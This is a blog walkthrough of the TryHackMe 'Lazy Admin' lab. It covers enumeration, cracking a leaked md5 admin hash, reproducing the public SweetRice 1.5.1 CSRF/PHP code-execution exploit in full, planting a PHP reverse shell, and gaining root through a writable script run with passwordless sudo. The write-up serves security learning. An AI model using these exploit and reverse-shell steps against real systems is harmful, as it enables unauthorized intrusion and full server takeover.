Lazy Admin — CTF Walkthrough — TryHackMe

Hello guys ! Welcome back to our another blog. Today we’re gonna solve the Lazy Admin room on TryHackMe. As the name is telling the Admin of something is lazy and that he/she has misconfigured something and now it’s our task to find that misconfiguration. So without wasting much time let’s start…

Logo - Lazy Admin

Enumeration:

So as usual our first step after booting the target is of enumeration. We’ll start by doing a ‘nmap’ scan.

nmap -sC -sV <ip>

We found port 22 & 80 are open and running ssh & http services respectively.

We can’t do anything on ssh bcoz we don’t have the credentials yet. So let’s browse to the IP.

Browsing to the IP address of target machine results into the default webpage of Apache Web Server.

http://<ip>/

Nothing interesting here. I also viewed the page source and there too nothing interesting.

Now let’s findout if there exists any hidden directories on the web server. I’m using the tool ‘gobuster’ and the wordlist of dirbuster.

gobuster dir -u http://<ip>/ -w /usr/share/wordlists/dirbuster/directory-list-2–3-medium.txt

We found a directory called ‘/content’. Let’s check it out.

http://<ip>/content/

Oh ! It’s a new website hosted. As you can see it’s using SweetRice CMS website management system. And there’s a notice for webmaster. It is saying that “If you are the webmaster, …” So I think there’s must be some login function in this website. I checked the page source of this webpage also and there too I found nothing.

So the only way to go ahead is to again find hidden directories but this time inside the ‘/content’ directory. This time I used multiple wordlists but I’m showing only the results of the one which is useful.

gobuster dir -u http://<ip>/content/ -w /usr share/wordlists/dirb/common.txt

Oooo! We found much more directories to look into. I visited every directory one-by-one and found only 2 of them interesting.

The first one is ‘/as’ which is the login form.

http://<ip>/content/as/

But we don’t have any valid creds for now. Trying some default user:password combinations resulted into failure.

Moving towards our next useful hidden directory i.e. ‘/inc’. Inside this directory, there are lots of file. But I found an interesting one among them. Now I leave it for you to search for that interesting file. Open each-and-every file and directory there and you’ll definitely find it.

So now going ahead, the interesting file was a SQL file and guess what, it contained the username and hashed password. The below line is from the file which contained login credentials:

14 => ‘INSERT INTO `% — %_options` VALUES(\’1\’,\’global_setting\’,\’a:17:{s:4:\\”name\\”;s:25:\\”Lazy Admin&#039;s Website\\”;s:6:\\”author\\”;s:10:\\”Lazy Admin\\”;s:5:\\”title\\”;s:0:\\”\\”;s:8:\\”keywords\\”;s:8:\\”Keywords\\”;s:11:\\”description\\”;s:11:\\”Description\\”;s:5:\\”admin\\”;s:7:\\”manager\\”;s:6:\\”passwd\\”;s:32:\\”<hashed_password>\\”;s:5:\\”close\\”;i:1;s:9:\\”close_tip\\”;s:454:\\”<p>Welcome to SweetRice — Thank your for install SweetRice as your website management system.</p><h1>This site is building now , please come late.</h1><p>If you are the webmaster,please go to Dashboard -> General -> Website setting </p><p>and uncheck the checkbox \\”Site close\\” to open your website.</p><p>More help at <a href=\\"http://www.basic-cms.org/docs/5-things-need-to-be-done-when-SweetRice-installed/\\">Tip for Basic CMS SweetRice installed</a></p>\\”;s:5:\\”cache\\”;i:0;s:13:\\”cache_expired\\”;i:0;s:10:\\”user_track\\”;i:0;s:11:\\”url_rewrite\\”;i:0;s:4:\\”logo\\”;s:0:\\”\\”;s:5:\\”theme\\”;s:0:\\”\\”;s:4:\\”lang\\”;s:9:\\”en-us.php\\”;s:11:\\”admin_email\\”;N;}\’,\’1575023409\’);’,

As you can see the username is manager. The password is hashed, so let’s use the tool ‘hash-identifier’ to identify the type of hashing algorithm used.

The results says that the password is hashed using ‘md5’ hashing algorithm. Using a website called md5hashing I got the plaintext password.

So now it’s time to login to the website. Remember? We found the login page previously. Yes ofcourse. How can you forget it! It’s an important finding.

Dashboard after logging into the website

Yeah! We are in! Look at the top left corner of the Dashboard, we’ve the version of SweetRice used and it is SweetRice 1.5.1.

Exploitation:

Using the ‘searchsploit’ tool, trying to find if there are any exploits for this.

searchsploit sweetrice 1.5.1

And we found 5 exploits. You can use anyone from these but first you should understand what the exploit will do and how to use it. For now, I’m using the last one i.e. Cross-Site Request Forgery / PHP Code Execution.

The exploit contained below HTML code

<! —
# Exploit Title: SweetRice 1.5.1 Arbitrary Code Execution
# Date: 30–11–2016
# Exploit Author: Ashiyane Digital Security Team
# Vendor Homepage:
http://www.basic-cms.org/
# Software Link:
http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip
# Version: 1.5.1

# Description :

# In SweetRice CMS Panel In Adding Ads Section SweetRice Allow To Admin Add
PHP Codes In Ads File
# A CSRF Vulnerabilty In Adding Ads Section Allow To Attacker To Execute
PHP Codes On Server .
# In This Exploit I Just Added a echo ‘<h1> Hacked </h1>’; phpinfo();
Code You Can
Customize Exploit For Your Self .

# Exploit :

<html>
<body onload=”document.exploit.submit();”>
<form action=”
http://localhost/sweetrice/as/?type=ad&mode=save" method=”POST” name=”exploit”>
<input type=”hidden” name=”adk” value=”hacked”/>
<textarea type=”hidden” name=”adv”>
<?php
echo ‘<h1> Hacked </h1>’;
phpinfo();?>
&lt;/textarea&gt;
</form>
</body>
</html>

<! —
# After HTML File Executed You Can Access Page In
http://localhost/sweetrice/inc/ads/hacked.php

Basically, this exploit will create a PHP file with some code in it and upload it on to the web server inside ‘/inc/ads/’ with filename as ‘hacked.php’, as mentioned in the last line of the exploit, so that we can execute PHP code on the server. So I’ll edit the exploit and replace the PHP code with such a code that will give me a reverse shell. You can get the PHP reverse shell code from here. Just change the IP address in this file to your tryhackme IP address and paste the whole code into the exploit file where the sample PHP code is written.

Now we’re ready to exploit our target. Remember that you must be logged into the website to be able to run the exploit. Otherwise, the exploit won’t work. So just use the credentials to login and then keep the browser open in the background.

Now run the exploit file using browser. You’ll be redirected to the ‘/ads’ directory of the website. If so, then your exploit has been successfully executed. So now we can execute the ‘hacked.php’ file which the exploit created with our reverse-shell code.

But before that, we should open up a listener. Use netcat to start the listener-nc -nlvp 1234

See, the port I used here i.e. 1234 is the default port in the reverse-shell code. If you’ve changed it too along with changing the IP address then use that.

Now it’s time to execute the ‘hacked.php’ file on the target server. Browse to- http://<ip>/content/inc/ads/hacked.php and you must get a reverse shell back to the netcat listener.

nc -nlvp <port>

Yeah! We’ve got the reverse connection.

Privilege Escalation:

Do some basic enumeration inside the target system to find attack vectors for privilege escalation.

Found User Flag

As you can see, we’re the user ‘www-data’ now and our goal is to become the ‘root’. So digging up more reveals that we can run ‘sudo’ without password to execute a perl file as root user.

$ sudo -l

Unfortunately, we don’t have permission to edit the file that we can run as root.

$ ls -l /home/itguy

So let’s just see what the file will do if executed.

$ cat /home/itguy/backup.pl

So this perl file is executing another bash file located inside the /etc directory called ‘copy.sh’. Let’s see if we have the permission to edit this bash file.

$ ls -l /etc/copy.sh

And yes! We have full permissions on the file. And you can also see the contents of the file. Do you know what this command inside the copy.sh file does? Any guess? If you’re from Hacking World, you would most probably know. Okay if you don’t, let me tell you. This is a single line bash reverse shell code which will give reverse shell to the IP 192.168.0.190:5554, in this case. So you just need to change the IP to your tryhackme IP in the file.

For that purpose, copy the whole line and paste it inside a text editor of your choice that is installed in your local kali machine (or whichever linux distro you’re using). Just replace the IP with your tryhackme IP and then again copy the whole line. Now run the command: cat > /etc/copy.sh into the reverse shell terminal and then paste the copied line. Now if you tried to do Ctrl+D to exit editing the file and return to the prompt $ , you won’t be able to do so. So now do Ctrl+C, I know it’ll exit the reverse-shell and return to your kali terminal, but let it be. Now again start the listener with the exact same command you used earlier and then browse again to http://<ip>/content/ads/inc/hacked.php to get the reverse shell back. After getting reverse shell once again, see the contents of ‘copy.sh’ file again. You’ll see that file was edited successfully and saved also.

Editing copy.sh file

Now we’re ready to get root. Split-up the terminal and start another netcat listener now with port 5554 unless you changed it while editing copy.sh file. And then in your reverse shell terminal run the command:

sudo /usr/bin/perl /home/itguy/backup.pl

You’ll get another reverse shell on your secondly opened netcat listener and that will be your root shell !

Getting root shell on the target

So yes! We’ve finally got the root shell and here we captured the root flag too.

So this was the walkthrough on the TryHackMe room LazyAdmin. I hope you understood the methodology and liked it. It was actually very easy but while explaining the things, my writeup got a bit longer. But if you’ve read till the end, thank you very much. If you have any suggestions regarding my writeups, let me know in the comments :)

Learner